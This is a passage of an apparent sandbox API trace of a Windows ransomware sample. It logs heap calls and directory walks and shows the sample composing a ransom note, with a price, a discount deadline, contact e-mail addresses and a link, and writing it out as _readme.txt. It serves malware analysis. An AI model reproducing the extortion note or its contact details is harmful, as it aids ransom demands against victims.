0x2e776e0 [0184.468] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.469] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.469] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.469] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0184.469] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.470] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.470] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.470] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.477] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.477] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.477] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.478] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.478] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.478] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0184.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0184.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.483] PathFindFileNameW (pszPath="C:\\Boot\\ru-RU\\") returned="ru-RU\\" [0184.483] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0184.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.483] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.483] PathFindFileNameW (pszPath="") returned="" [0184.484] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0184.484] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0184.484] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0184.484] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0184.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.485] PathAppendW (in: pszPath="C:\\Boot\\ru-RU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 1 [0184.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.485] PathFileExistsW (pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 0 [0184.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e93a68 [0184.486] lstrcpyW (in: lpString1=0x2e93a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0184.487] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0184.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0184.487] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\_readme.txt" (normalized: "c:\\boot\\ru-ru\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0184.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0184.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a68 | out: hHeap=0x620000) returned 1 [0184.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.488] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*" (normalized: "c:\\boot\\ru-ru\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0184.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.489] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.489] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0184.489] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0184.489] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0184.490] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.490] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83700 | out: hHeap=0x620000) returned 1 [0184.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83700 [0184.490] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.490] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.493] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.493] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.495] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.495] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0184.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.496] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.496] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.496] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.496] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.496] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.496] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.496] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.497] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.497] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.497] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.497] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.497] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.498] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.498] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.498] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.499] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.499] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.501] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.501] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.501] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.502] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.502] HeapFree (in: 